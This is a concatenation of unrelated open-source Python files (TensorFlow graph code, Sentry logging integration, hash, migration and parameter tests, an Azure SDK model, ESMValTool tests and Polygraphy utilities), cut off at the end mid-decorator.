num_failures, num_tests = doctest.testfile('docs/quickstart_python3.txt')
else:
num_failures, num_tests = doctest.testfile('docs/quickstart.txt')
if num_failures > 0:
print("%d failures out of %d tests" % (num_failures, num_tests))
sys.exit(1)
sys.exit(0)
|
code/extras/graph_representations.py | vamships/RelationPrediction | 376 | 11195748 | import numpy as np
from scipy.sparse import coo_matrix
import math
import tensorflow as tf
from model import Model
class MessageGraph():
sender_indices = None
receiver_indices = None
message_types = None
def __init__(self, edges, vertex_count, label_count):
self.vertex_count = vertex_count
self.label_count = label_count
self.edges = edges
self.process(self.edges)
def process(self, triplets):
triplets = tf.transpose(triplets)
self.sender_indices = triplets[0]
self.receiver_indices = triplets[2]
self.message_types = triplets[1]
self.edge_count = tf.shape(self.sender_indices)[0]
def get_sender_indices(self):
return self.sender_indices
def get_type_indices(self):
return self.message_types
def get_receiver_indices(self):
return self.receiver_indices
'''
def compute_normalized_values(self, receiver_indices, message_types):
if self.normalization[0] == "global":
mrs = receiver_indices
else:
mrs = [tuple(x) for x in np.vstack((receiver_indices, message_types)).transpose()]
counts = {}
for mr in mrs:
if mr in counts:
counts[mr] += 1.0
else:
counts[mr] = 1.0
return np.array([1.0 / counts[mr] for mr in mrs]).astype(np.float32)
def compute_sparse_mtr(self):
if self.normalization[0] != "none":
            mtr_values = self.compute_normalized_values(self.receiver_indices, self.message_types)
else:
mtr_values = np.ones_like(self.message_types).astype(np.int32)
message_indices = np.arange(self.edge_count).astype(np.int32)
mtr_indices = np.vstack((self.receiver_indices, message_indices)).transpose()
mtr_shape = [self.vertex_count, self.edge_count]
return mtr_indices, mtr_values, mtr_shape
'''
def forward_incidence_matrix(self, normalization):
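        # Builds a sparse |V| x |E| incidence matrix that routes each message
        # (edge) to its receiver vertex. "global" softmax-normalizes each
        # vertex's row over its incoming messages; "local" normalizes per
        # (relation type, vertex) pair and then sums over relation types.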
if normalization[0] == "none":
mtr_values = tf.to_float(tf.ones_like(self.receiver_indices))
message_indices = tf.range(self.edge_count)
mtr_indices = tf.to_int64(tf.transpose(tf.stack([self.receiver_indices, message_indices])))
mtr_shape = tf.to_int64(tf.stack([self.vertex_count, self.edge_count]))
tensor = tf.SparseTensor(indices=mtr_indices,
values=mtr_values,
dense_shape=mtr_shape)
return tensor
elif normalization[0] == "global":
mtr_values = tf.to_float(tf.ones_like(self.receiver_indices))
message_indices = tf.range(self.edge_count)
mtr_indices = tf.to_int64(tf.transpose(tf.stack([self.receiver_indices, message_indices])))
mtr_shape = tf.to_int64(tf.stack([self.vertex_count, self.edge_count]))
tensor = tf.sparse_softmax(tf.SparseTensor(indices=mtr_indices,
values=mtr_values,
dense_shape=mtr_shape))
return tensor
elif normalization[0] == "local":
mtr_values = tf.to_float(tf.ones_like(self.receiver_indices))
message_indices = tf.range(self.edge_count)
mtr_indices = tf.to_int64(tf.transpose(tf.stack([self.message_types, self.receiver_indices, message_indices])))
mtr_shape = tf.to_int64(tf.stack([self.label_count*2, self.vertex_count, self.edge_count]))
tensor = tf.sparse_softmax(tf.SparseTensor(indices=mtr_indices,
values=mtr_values,
dense_shape=mtr_shape))
tensor = tf.sparse_reduce_sum_sparse(tensor, 0)
return tensor
def backward_incidence_matrix(self, normalization):
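        # Same construction as forward_incidence_matrix, but routes each
        # message (edge) to its sender vertex instead of its receiver.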
if normalization[0] == "none":
mtr_values = tf.to_float(tf.ones_like(self.sender_indices))
message_indices = tf.range(self.edge_count)
mtr_indices = tf.to_int64(tf.transpose(tf.stack([self.sender_indices, message_indices])))
mtr_shape = tf.to_int64(tf.stack([self.vertex_count, self.edge_count]))
tensor = tf.SparseTensor(indices=mtr_indices,
values=mtr_values,
dense_shape=mtr_shape)
return tensor
elif normalization[0] == "global":
mtr_values = tf.to_float(tf.ones_like(self.sender_indices))
message_indices = tf.range(self.edge_count)
mtr_indices = tf.to_int64(tf.transpose(tf.stack([self.sender_indices, message_indices])))
mtr_shape = tf.to_int64(tf.stack([self.vertex_count, self.edge_count]))
tensor = tf.sparse_softmax(tf.SparseTensor(indices=mtr_indices,
values=mtr_values,
dense_shape=mtr_shape))
return tensor
elif normalization[0] == "local":
mtr_values = tf.to_float(tf.ones_like(self.sender_indices))
message_indices = tf.range(self.edge_count)
mtr_indices = tf.to_int64(tf.transpose(tf.stack([self.message_types, self.sender_indices, message_indices])))
mtr_shape = tf.to_int64(tf.stack([self.label_count*2, self.vertex_count, self.edge_count]))
tensor = tf.sparse_softmax(tf.SparseTensor(indices=mtr_indices,
values=mtr_values,
dense_shape=mtr_shape))
tensor = tf.sparse_reduce_sum_sparse(tensor, 0)
return tensor
class Representation(Model):
normalization="global"
graph = None
X = None
def __init__(self, triples, settings, bipartite=False):
self.triples = np.array(triples)
self.entity_count = settings['EntityCount']
self.relation_count = settings['RelationCount']
self.edge_count = self.triples.shape[0]*2
#self.process(self.triples)
#self.graph = None#MessageGraph(triples, self.entity_count, self.relation_count)
def get_graph(self):
if self.graph is None:
self.graph = MessageGraph(self.X, self.entity_count, self.relation_count)
return self.graph
def local_initialize_train(self):
self.X = tf.placeholder(tf.int32, shape=[None, 3], name='graph_edges')
def local_get_train_input_variables(self):
return [self.X]
def local_get_test_input_variables(self):
return [self.X]
'''
def compute_normalized_values(self, receiver_indices, message_types):
if self.normalization == "global":
mrs = receiver_indices
else:
mrs = [tuple(x) for x in np.vstack((receiver_indices, message_types)).transpose()]
counts = {}
for mr in mrs:
if mr in counts:
counts[mr] += 1.0
else:
counts[mr] = 1.0
return np.array([1.0 / counts[mr] for mr in mrs]).astype(np.float32)
def compute_sparse_mtr(self):
if self.normalization != "none":
mtr_values = self.compute_normalized_values(self.receiver_indices, self.message_types)
else:
mtr_values = np.ones_like(self.message_types).astype(np.int32)
message_indices = np.arange(self.edge_count).astype(np.int32)
mtr_indices = np.vstack((self.receiver_indices, message_indices)).transpose()
mtr_shape = [self.entity_count, self.edge_count]
return mtr_indices, mtr_values, mtr_shape
def process(self, triplets):
triplets = triplets.transpose()
self.sender_indices = np.hstack((triplets[0], triplets[2])).astype(np.int32)
self.receiver_indices = np.hstack((triplets[2], triplets[0])).astype(np.int32)
self.message_types = np.hstack(
(triplets[1], triplets[1] + self.relation_count)).astype(np.int32)
'''
|
sentry_sdk/integrations/logging.py | olasd/sentry-python | 553 | 11195749 | from __future__ import absolute_import
import logging
import datetime
from sentry_sdk.hub import Hub
from sentry_sdk.utils import (
to_string,
event_from_exception,
current_stacktrace,
capture_internal_exceptions,
)
from sentry_sdk.integrations import Integration
from sentry_sdk._compat import iteritems
from sentry_sdk._types import MYPY
if MYPY:
from logging import LogRecord
from typing import Any
from typing import Dict
from typing import Optional
DEFAULT_LEVEL = logging.INFO
DEFAULT_EVENT_LEVEL = logging.ERROR
_IGNORED_LOGGERS = set(["sentry_sdk.errors"])
def ignore_logger(
name # type: str
):
# type: (...) -> None
"""This disables recording (both in breadcrumbs and as events) calls to
a logger of a specific name. Among other uses, many of our integrations
use this to prevent their actions being recorded as breadcrumbs. Exposed
to users as a way to quiet spammy loggers.
:param name: The name of the logger to ignore (same string you would pass to ``logging.getLogger``).
"""
_IGNORED_LOGGERS.add(name)
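# Example (illustrative): silence a chatty third-party logger so its records
# produce neither breadcrumbs nor events:
#
#   ignore_logger("a.spammy.logger")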
class LoggingIntegration(Integration):
identifier = "logging"
def __init__(self, level=DEFAULT_LEVEL, event_level=DEFAULT_EVENT_LEVEL):
# type: (Optional[int], Optional[int]) -> None
self._handler = None
self._breadcrumb_handler = None
if level is not None:
self._breadcrumb_handler = BreadcrumbHandler(level=level)
if event_level is not None:
self._handler = EventHandler(level=event_level)
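    # Typical setup (illustrative): capture INFO+ records as breadcrumbs and
    # ERROR+ records as events:
    #
    #   sentry_sdk.init(
    #       dsn="...",
    #       integrations=[LoggingIntegration(level=logging.INFO,
    #                                        event_level=logging.ERROR)],
    #   )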
def _handle_record(self, record):
# type: (LogRecord) -> None
if self._handler is not None and record.levelno >= self._handler.level:
self._handler.handle(record)
if (
self._breadcrumb_handler is not None
and record.levelno >= self._breadcrumb_handler.level
):
self._breadcrumb_handler.handle(record)
@staticmethod
def setup_once():
# type: () -> None
old_callhandlers = logging.Logger.callHandlers # type: ignore
def sentry_patched_callhandlers(self, record):
# type: (Any, LogRecord) -> Any
try:
return old_callhandlers(self, record)
finally:
# This check is done twice, once also here before we even get
# the integration. Otherwise we have a high chance of getting
# into a recursion error when the integration is resolved
# (this also is slower).
if record.name not in _IGNORED_LOGGERS:
integration = Hub.current.get_integration(LoggingIntegration)
if integration is not None:
integration._handle_record(record)
logging.Logger.callHandlers = sentry_patched_callhandlers # type: ignore
def _can_record(record):
# type: (LogRecord) -> bool
return record.name not in _IGNORED_LOGGERS
def _breadcrumb_from_record(record):
# type: (LogRecord) -> Dict[str, Any]
return {
"ty": "log",
"level": _logging_to_event_level(record.levelname),
"category": record.name,
"message": record.message,
"timestamp": datetime.datetime.utcfromtimestamp(record.created),
"data": _extra_from_record(record),
}
def _logging_to_event_level(levelname):
# type: (str) -> str
return {"critical": "fatal"}.get(levelname.lower(), levelname.lower())
COMMON_RECORD_ATTRS = frozenset(
(
"args",
"created",
"exc_info",
"exc_text",
"filename",
"funcName",
"levelname",
"levelno",
"linenno",
"lineno",
"message",
"module",
"msecs",
"msg",
"name",
"pathname",
"process",
"processName",
"relativeCreated",
"stack",
"tags",
"thread",
"threadName",
"stack_info",
)
)
def _extra_from_record(record):
# type: (LogRecord) -> Dict[str, None]
return {
k: v
for k, v in iteritems(vars(record))
if k not in COMMON_RECORD_ATTRS
and (not isinstance(k, str) or not k.startswith("_"))
}
class EventHandler(logging.Handler, object):
"""
A logging handler that emits Sentry events for each log record
Note that you do not have to use this class if the logging integration is enabled, which it is by default.
"""
def emit(self, record):
# type: (LogRecord) -> Any
with capture_internal_exceptions():
self.format(record)
return self._emit(record)
def _emit(self, record):
# type: (LogRecord) -> None
if not _can_record(record):
return
hub = Hub.current
if hub.client is None:
return
client_options = hub.client.options
# exc_info might be None or (None, None, None)
if record.exc_info is not None and record.exc_info[0] is not None:
event, hint = event_from_exception(
record.exc_info,
client_options=client_options,
mechanism={"type": "logging", "handled": True},
)
elif record.exc_info and record.exc_info[0] is None:
event = {}
hint = {}
with capture_internal_exceptions():
event["threads"] = {
"values": [
{
"stacktrace": current_stacktrace(
client_options["with_locals"]
),
"crashed": False,
"current": True,
}
]
}
else:
event = {}
hint = {}
hint["log_record"] = record
event["level"] = _logging_to_event_level(record.levelname)
event["logger"] = record.name
event["logentry"] = {"message": to_string(record.msg), "params": record.args}
event["extra"] = _extra_from_record(record)
hub.capture_event(event, hint=hint)
# Legacy name
SentryHandler = EventHandler
class BreadcrumbHandler(logging.Handler, object):
"""
A logging handler that records breadcrumbs for each log record.
Note that you do not have to use this class if the logging integration is enabled, which it is by default.
"""
def emit(self, record):
# type: (LogRecord) -> Any
with capture_internal_exceptions():
self.format(record)
return self._emit(record)
def _emit(self, record):
# type: (LogRecord) -> None
if not _can_record(record):
return
Hub.current.add_breadcrumb(
_breadcrumb_from_record(record), hint={"log_record": record}
)
|
Src/StdLib/Lib/test/test_sha.py | cwensley/ironpython2 | 2,209 | 11195751 | # Testing sha module (NIST's Secure Hash Algorithm)
# use the three examples from Federal Information Processing Standards
# Publication 180-1, Secure Hash Standard, 1995 April 17
# http://www.itl.nist.gov/div897/pubs/fip180-1.htm
import warnings
warnings.filterwarnings("ignore", "the sha module is deprecated.*",
DeprecationWarning)
import sha
import unittest
from test import test_support
class SHATestCase(unittest.TestCase):
def check(self, data, digest):
# Check digest matches the expected value
obj = sha.new(data)
computed = obj.hexdigest()
self.assertTrue(computed == digest)
# Verify that the value doesn't change between two consecutive
# digest operations.
computed_again = obj.hexdigest()
self.assertTrue(computed == computed_again)
# Check hexdigest() output matches digest()'s output
digest = obj.digest()
hexd = ""
for c in digest:
hexd += '%02x' % ord(c)
self.assertTrue(computed == hexd)
def test_case_1(self):
self.check("abc",
"a9993e364706816aba3e25717850c26c9cd0d89d")
def test_case_2(self):
self.check("abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq",
"84983e441c3bd26ebaae4aa1f95129e5e54670f1")
def test_case_3(self):
self.check("a" * 1000000,
"34aa973cd4c4daa4f61eeb2bdbad27316534016f")
def test_case_4(self):
self.check(chr(0xAA) * 80,
'4ca0ef38f1794b28a8f8ee110ee79d48ce13be25')
def test_main():
test_support.run_unittest(SHATestCase)
if __name__ == "__main__":
test_main()
|
migrations/versions/166d65e5a7e3_add_aggregatetest_gr.py | vault-the/changes | 443 | 11195760 | """Add AggregateTest{Group,Suite}
Revision ID: 166d65e5a7e3
Revises: 21b7c3b2ce88
Create Date: 2013-12-04 13:19:26.702555
"""
# revision identifiers, used by Alembic.
revision = '166d65e5a7e3'
down_revision = '21b7c3b2ce88'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.create_table(
'aggtestsuite',
sa.Column('id', sa.GUID(), nullable=False),
sa.Column('project_id', sa.GUID(), nullable=False),
sa.Column('name_sha', sa.String(length=40), nullable=False),
sa.Column('name', sa.Text(), nullable=False),
sa.Column('first_build_id', sa.GUID(), nullable=False),
sa.Column('date_created', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['first_build_id'], ['build.id'], ),
sa.ForeignKeyConstraint(['project_id'], ['project.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint(
'project_id', 'name_sha', name='unq_aggtestsuite_key')
)
op.create_index('idx_aggtestsuite_first_build_id', 'aggtestsuite', ['first_build_id'])
op.create_table(
'aggtestgroup',
sa.Column('id', sa.GUID(), nullable=False),
sa.Column('project_id', sa.GUID(), nullable=False),
sa.Column('suite_id', sa.GUID(), nullable=True),
sa.Column('parent_id', sa.GUID(), nullable=True),
sa.Column('name_sha', sa.String(length=40), nullable=False),
sa.Column('name', sa.Text(), nullable=False),
sa.Column('first_build_id', sa.GUID(), nullable=False),
sa.Column('date_created', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['first_build_id'], ['build.id'], ),
sa.ForeignKeyConstraint(['parent_id'], ['aggtestgroup.id'], ),
sa.ForeignKeyConstraint(['project_id'], ['project.id'], ),
sa.ForeignKeyConstraint(['suite_id'], ['aggtestsuite.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint(
'project_id', 'suite_id', 'name_sha', name='unq_aggtestgroup_key')
)
op.create_index('idx_aggtestgroup_suite_id', 'aggtestgroup', ['suite_id'])
op.create_index('idx_aggtestgroup_parent_id', 'aggtestgroup', ['parent_id'])
op.create_index('idx_aggtestgroup_first_build_id', 'aggtestgroup', ['first_build_id'])
def downgrade():
op.drop_table('aggtestgroup')
op.drop_table('aggtestsuite')
|
tests/test_require_user.py | borisgrafx/client | 3,968 | 11195782 | """
require user tests.
"""
import pytest
import wandb
@pytest.fixture
def require_mock(mocker):
cleanup = []
def fn(require, func):
cleanup.append(require)
mocker.patch.object(
wandb.wandb_sdk.wandb_require._Requires,
"require_" + require,
func,
create=True,
)
yield fn
for require in cleanup:
wandb.__dict__.pop("require_" + require, None)
def test_require_single(user_test, capsys):
with pytest.raises(wandb.errors.RequireError):
wandb.require("something")
captured = capsys.readouterr()
assert "unsupported requirement: something" in captured.err
assert "http://wandb.me/library-require" in captured.err
def test_require_list(user_test, capsys):
with pytest.raises(wandb.errors.RequireError):
wandb.require(["something", "another"])
captured = capsys.readouterr()
assert "unsupported requirement: something" in captured.err
assert "unsupported requirement: another" in captured.err
def test_require_version(user_test, capsys):
with pytest.raises(wandb.errors.RequireError):
wandb.require("something@beta")
captured = capsys.readouterr()
assert "unsupported requirement: something" in captured.err
def test_require_param(user_test, capsys):
with pytest.raises(wandb.errors.RequireError):
wandb.require("something:param@beta")
captured = capsys.readouterr()
assert "unsupported requirement: something" in captured.err
def test_require_good(user_test, require_mock):
def mock_require_test(self):
wandb.require_test = lambda x: x + 2
require_mock("test", mock_require_test)
wandb.require("test")
assert wandb.require_test(2) == 4
def test_require_require(user_test, require_mock):
# This is a noop now that it is "released"
wandb.require("require")
|
src/express-route-cross-connection/azext_expressroutecrossconnection/vendored_sdks/v2018_04_01/models/verification_ip_flow_parameters_py3.py | Mannan2812/azure-cli-extensions | 207 | 11195789 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class VerificationIPFlowParameters(Model):
"""Parameters that define the IP flow to be verified.
All required parameters must be populated in order to send to Azure.
:param target_resource_id: Required. The ID of the target resource to
perform next-hop on.
:type target_resource_id: str
:param direction: Required. The direction of the packet represented as a
5-tuple. Possible values include: 'Inbound', 'Outbound'
:type direction: str or ~azure.mgmt.network.v2018_04_01.models.Direction
:param protocol: Required. Protocol to be verified on. Possible values
include: 'TCP', 'UDP'
:type protocol: str or
~azure.mgmt.network.v2018_04_01.models.IpFlowProtocol
:param local_port: Required. The local port. Acceptable values are a
single integer in the range (0-65535). Support for * for the source port,
which depends on the direction.
:type local_port: str
:param remote_port: Required. The remote port. Acceptable values are a
single integer in the range (0-65535). Support for * for the source port,
which depends on the direction.
:type remote_port: str
:param local_ip_address: Required. The local IP address. Acceptable values
are valid IPv4 addresses.
:type local_ip_address: str
:param remote_ip_address: Required. The remote IP address. Acceptable
values are valid IPv4 addresses.
:type remote_ip_address: str
:param target_nic_resource_id: The NIC ID. (If VM has multiple NICs and IP
forwarding is enabled on any of them, then this parameter must be
specified. Otherwise optional).
:type target_nic_resource_id: str
"""
_validation = {
'target_resource_id': {'required': True},
'direction': {'required': True},
'protocol': {'required': True},
'local_port': {'required': True},
'remote_port': {'required': True},
'local_ip_address': {'required': True},
'remote_ip_address': {'required': True},
}
_attribute_map = {
'target_resource_id': {'key': 'targetResourceId', 'type': 'str'},
'direction': {'key': 'direction', 'type': 'str'},
'protocol': {'key': 'protocol', 'type': 'str'},
'local_port': {'key': 'localPort', 'type': 'str'},
'remote_port': {'key': 'remotePort', 'type': 'str'},
'local_ip_address': {'key': 'localIPAddress', 'type': 'str'},
'remote_ip_address': {'key': 'remoteIPAddress', 'type': 'str'},
'target_nic_resource_id': {'key': 'targetNicResourceId', 'type': 'str'},
}
def __init__(self, *, target_resource_id: str, direction, protocol, local_port: str, remote_port: str, local_ip_address: str, remote_ip_address: str, target_nic_resource_id: str=None, **kwargs) -> None:
super(VerificationIPFlowParameters, self).__init__(**kwargs)
self.target_resource_id = target_resource_id
self.direction = direction
self.protocol = protocol
self.local_port = local_port
self.remote_port = remote_port
self.local_ip_address = local_ip_address
self.remote_ip_address = remote_ip_address
self.target_nic_resource_id = target_nic_resource_id
|
tests/API0/testdateparam.py | mcepl/param | 123 | 11195791 | <reponame>mcepl/param<filename>tests/API0/testdateparam.py
"""
Unit test for Date parameters.
"""
import unittest
import datetime as dt
import param
class TestDateParameters(unittest.TestCase):
def test_initialization_out_of_bounds(self):
try:
class Q(param.Parameterized):
q = param.Date(dt.datetime(2017,2,27),
bounds=(dt.datetime(2017,2,1),
dt.datetime(2017,2,26)))
except ValueError:
pass
else:
raise AssertionError("No exception raised on out-of-bounds date")
def test_set_out_of_bounds(self):
class Q(param.Parameterized):
q = param.Date(bounds=(dt.datetime(2017,2,1),
dt.datetime(2017,2,26)))
try:
Q.q = dt.datetime(2017,2,27)
except ValueError:
pass
else:
raise AssertionError("No exception raised on out-of-bounds date")
def test_set_exclusive_out_of_bounds(self):
class Q(param.Parameterized):
q = param.Date(bounds=(dt.datetime(2017,2,1),
dt.datetime(2017,2,26)),
inclusive_bounds=(True, False))
try:
Q.q = dt.datetime(2017,2,26)
except ValueError:
pass
else:
raise AssertionError("No exception raised on out-of-bounds date")
def test_get_soft_bounds(self):
q = param.Date(dt.datetime(2017,2,25),
bounds=(dt.datetime(2017,2,1),
dt.datetime(2017,2,26)),
softbounds=(dt.datetime(2017,2,1),
dt.datetime(2017,2,25)))
self.assertEqual(q.get_soft_bounds(), (dt.datetime(2017,2,1),
dt.datetime(2017,2,25)))
|
tests/integration/test_cmorize_obs.py | ESMValGroup/ESMValTool | 148 | 11195796 | <gh_stars>100-1000
"""Tests for the module :mod:`esmvaltool.cmorizers.obs.cmorize_obs`."""
import contextlib
import os
import sys
import iris
import numpy as np
import yaml
from cf_units import Unit
from esmvaltool.cmorizers.obs.cmorize_obs import main as run
@contextlib.contextmanager
def keep_cwd():
"""
Use a context manager since the cmorizer enters
    and stays in the cmorization dir, which risks writing
test outputs away from test-reports.
"""
curr_path = os.getcwd()
try:
yield
finally:
os.chdir(curr_path)
def write_config_user_file(dirname):
"""Replace config_user file values for testing."""
config_file = dirname / 'config-user.yml'
cfg = {
'output_dir': str(dirname / 'output_dir'),
'rootpath': {
'RAWOBS': str(dirname / 'raw_stuff'),
},
'log_level': 'debug',
}
config_file.write_text(yaml.safe_dump(cfg, encoding=None))
return str(config_file)
def _create_sample_cube(time_step):
"""Create a quick CMOR-compliant sample cube."""
coord_sys = iris.coord_systems.GeogCS(iris.fileformats.pp.EARTH_RADIUS)
cube_data = np.ones((1, 3, 2, 2))
cube_data[0, 1, 1, 1] = 22.
time = iris.coords.DimCoord([
time_step,
],
standard_name='time',
bounds=[[time_step - 0.5, time_step + 0.5]],
units=Unit('days since 0000-01-01',
calendar='gregorian'))
zcoord = iris.coords.DimCoord([0.5, 5., 50.],
var_name='depth',
standard_name='depth',
bounds=[[0., 2.5], [2.5, 25.], [25., 250.]],
units='m',
attributes={'positive': 'down'})
lons = iris.coords.DimCoord([1.5, 2.5],
standard_name='longitude',
bounds=[[1., 2.], [2., 3.]],
units='K',
coord_system=coord_sys)
lats = iris.coords.DimCoord([1.5, 2.5],
standard_name='latitude',
bounds=[[1., 2.], [2., 3.]],
units='K',
coord_system=coord_sys)
coords_spec = [(time, 0), (zcoord, 1), (lats, 2), (lons, 3)]
cube = iris.cube.Cube(cube_data, dim_coords_and_dims=coords_spec)
return cube
def put_dummy_data(data_path):
"""Create a small dummy netCDF file to be cmorized."""
for count, step in enumerate(np.arange(0.5, 12.5)):
mon = "{:02d}".format(count)
gen_cube = _create_sample_cube(step)
file_path = os.path.join(data_path,
"woa18_decav81B0_t" + mon + "_01.nc")
gen_cube.var_name = "t_an"
iris.save(gen_cube, file_path)
file_path = os.path.join(data_path,
"woa18_decav81B0_s" + mon + "_01.nc")
gen_cube.var_name = "s_an"
iris.save(gen_cube, file_path)
file_path = os.path.join(data_path, "woa18_all_o" + mon + "_01.nc")
gen_cube.var_name = "o_an"
iris.save(gen_cube, file_path)
file_path = os.path.join(data_path, "woa18_all_n" + mon + "_01.nc")
gen_cube.var_name = "n_an"
iris.save(gen_cube, file_path)
file_path = os.path.join(data_path, "woa18_all_p" + mon + "_01.nc")
gen_cube.var_name = "p_an"
iris.save(gen_cube, file_path)
file_path = os.path.join(data_path, "woa18_all_i" + mon + "_01.nc")
gen_cube.var_name = "i_an"
iris.save(gen_cube, file_path)
def check_log_file(log_file, no_data=False):
"""Check the cmorization log file."""
with open(log_file, 'r') as log:
if no_data:
msg = "Could not find raw data WOA"
else:
msg = "Fixing data"
assert any(msg in line for line in log)
def check_output_exists(output_path):
"""Check if cmorizer outputted."""
# eg Tier2/WOA/OBS6_WOA_clim_2018_Omon_thetao_200001-200012.nc
output_files = os.listdir(output_path)
assert len(output_files) == 8
assert 'OBS6_WOA_clim' in output_files[0]
out_files = [s.split("_")[5] for s in output_files]
assert 'thetao' in out_files
assert 'so' in out_files
assert 'no3' in out_files
assert 'po4' in out_files
assert 'o2' in out_files
assert 'si' in out_files
assert 'sos' in out_files
assert 'tos' in out_files
def check_conversion(output_path):
"""Check basic cmorization."""
cube = iris.load_cube(os.path.join(output_path,
os.listdir(output_path)[0]))
assert cube.coord("time").units == Unit('days since 1950-1-1 00:00:00',
calendar='gregorian')
assert cube.coord("latitude").units == 'degrees'
@contextlib.contextmanager
def arguments(*args):
"""Arrange contextmanager."""
backup = sys.argv
sys.argv = list(args)
yield
sys.argv = backup
def test_cmorize_obs_woa_no_data(tmp_path):
"""Test for example run of cmorize_obs command."""
config_user_file = write_config_user_file(tmp_path)
os.makedirs(os.path.join(tmp_path, 'raw_stuff', 'Tier2'))
with keep_cwd():
with arguments(
'cmorize_obs',
'-c',
config_user_file,
'-o',
'WOA',
):
run()
log_dir = os.path.join(tmp_path, 'output_dir')
log_file = os.path.join(log_dir,
os.listdir(log_dir)[0], 'run', 'main_log.txt')
check_log_file(log_file, no_data=True)
def test_cmorize_obs_woa_data(tmp_path):
"""Test for example run of cmorize_obs command."""
config_user_file = write_config_user_file(tmp_path)
os.makedirs(os.path.join(tmp_path, 'raw_stuff'))
data_path = os.path.join(tmp_path, 'raw_stuff', 'Tier2', 'WOA')
os.makedirs(data_path)
put_dummy_data(data_path)
with keep_cwd():
with arguments(
'cmorize_obs',
'-c',
config_user_file,
'-o',
'WOA',
):
run()
log_dir = os.path.join(tmp_path, 'output_dir')
log_file = os.path.join(log_dir,
os.listdir(log_dir)[0], 'run', 'main_log.txt')
check_log_file(log_file, no_data=False)
output_path = os.path.join(log_dir, os.listdir(log_dir)[0], 'Tier2', 'WOA')
check_output_exists(output_path)
check_conversion(output_path)
|
tools/Polygraphy/polygraphy/tools/args/util/util.py | KaliberAI/TensorRT | 5,249 | 11195810 | <filename>tools/Polygraphy/polygraphy/tools/args/util/util.py
#
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from polygraphy import constants, mod, util
from polygraphy.common import TensorMetadata
from polygraphy.logger import G_LOGGER, LogMode
from polygraphy.tools.script import Script, ensure_safe, inline, safe
np = mod.lazy_import("numpy")
@mod.export()
def cast(val):
"""
Cast a value from a string to one of:
[int, float, str, List[int], List[float], List[str]]
Args:
val (str): The value to cast.
Returns:
object: The casted value.
"""
val = str(val.strip())
if val.strip("[]") != val:
return [cast(elem) for elem in val.strip("[]").split(",")]
try:
return int(val) # This fails for float strings like '0.0'
except:
pass
try:
return float(val) # This fails for non-numerical strings like 'isildur'
except:
pass
return val.strip("\"'")
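# For illustration, `cast` maps strings to Python values roughly as follows:
#   cast("2")       -> 2
#   cast("0.5")     -> 0.5
#   cast("[1, 2]")  -> [1, 2]
#   cast("'text'")  -> "text"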
@mod.export()
def run_script(script_func, *args):
"""
Populates a script using the provided callable, then returns
the variable indicated by the return value of the callable.
Args:
script_func (Callable(Script, *args) -> str):
A callable that populates a Script and then returns
the name of an object defined within the script to retrieve.
args:
            Additional positional arguments to pass to script_func.
The script_func should accept these by variable name instead
of taking the values themselves. Values of ``None`` will be
passed directly instead of by variable name.
Returns:
object:
An object defined within the script, or ``None`` if it is not
defined by the script.
"""
script = Script()
arg_names = []
for index, arg in enumerate(args):
if arg is not None:
arg_name = safe("__arg{:}", index)
locals()[arg_name.unwrap()] = arg
arg_names.append(inline(arg_name))
else:
arg_names.append(None)
safe_ret_name = script_func(script, *arg_names)
exec(str(script), globals(), locals())
if safe_ret_name is not None:
ret_name = ensure_safe(safe_ret_name).unwrap()
if ret_name in locals():
return locals()[ret_name]
return None
@mod.export()
def get(args, attr, default=None):
"""
Gets a command-line argument if it exists, otherwise returns a default value.
Args:
args: The command-line arguments.
attr (str): The name of the command-line argument.
default (obj): The default value to return if the argument is not found. Defaults to None.
"""
if hasattr(args, attr):
return getattr(args, attr)
return default
@mod.export()
def get_outputs(args, name):
outputs = get(args, name)
if outputs is not None and len(outputs) == 2 and outputs == ["mark", "all"]:
outputs = constants.MARK_ALL
return outputs
@mod.export()
def get_outputs_for_script(script, outputs):
if outputs == constants.MARK_ALL:
script.add_import(["constants"], frm="polygraphy")
outputs = inline(safe("constants.MARK_ALL"))
return outputs
def np_types():
"""
Returns a list of human-readable names of NumPy data types.
"""
return sorted(set(np.dtype(dtype).name for dtype in np.sctypeDict.values()))
def np_type_from_str(dt_str):
"""
Converts a string representation of a data type to a NumPy data type.
Args:
dt_str (str): The string representation of the data type.
Returns:
np.dtype: The NumPy data type.
Raises:
KeyError: If the provided string does not correspond to a NumPy data type.
"""
try:
return {np.dtype(dtype).name: np.dtype(dtype) for dtype in np.sctypeDict.values()}[dt_str]
except KeyError:
G_LOGGER.error(
"Could not understand data type: {:}. Did you forget to specify a data type? "
"Please use one of: {:} or `auto`.".format(dt_str, np_types())
)
raise
@mod.export()
def parse_dict_with_default(arg_lst, cast_to=None, sep=None):
"""
Generate a dictionary from a list of arguments of the form:
``<key>:<val>``. If ``<key>`` is empty, the value will be assigned
to an empty string key in the returned mapping.
Args:
arg_lst (List[str]):
The arguments to map.
cast_to (type):
The type to cast the values in the map. By default,
uses the type returned by ``cast``.
sep (str):
The separator between the key and value strings.
Returns:
Dict[str, obj]: The mapping.
"""
sep = util.default(sep, ":")
if arg_lst is None:
return
arg_map = {}
for arg in arg_lst:
key, _, val = arg.rpartition(sep)
val = cast(val)
if cast_to:
val = cast_to(val)
arg_map[key] = val
return arg_map
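# A hedged usage sketch for ``parse_dict_with_default``; the mappings shown are
# illustrative assumptions based on the docstring, not recorded output:
# parse_dict_with_default(["layer0:16", ":8"]) -> {"layer0": 16, "": 8}
# parse_dict_with_default(["mode:fast"], cast_to=str) -> {"mode": "fast"}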
@mod.deprecate(
remove_in="0.35.0",
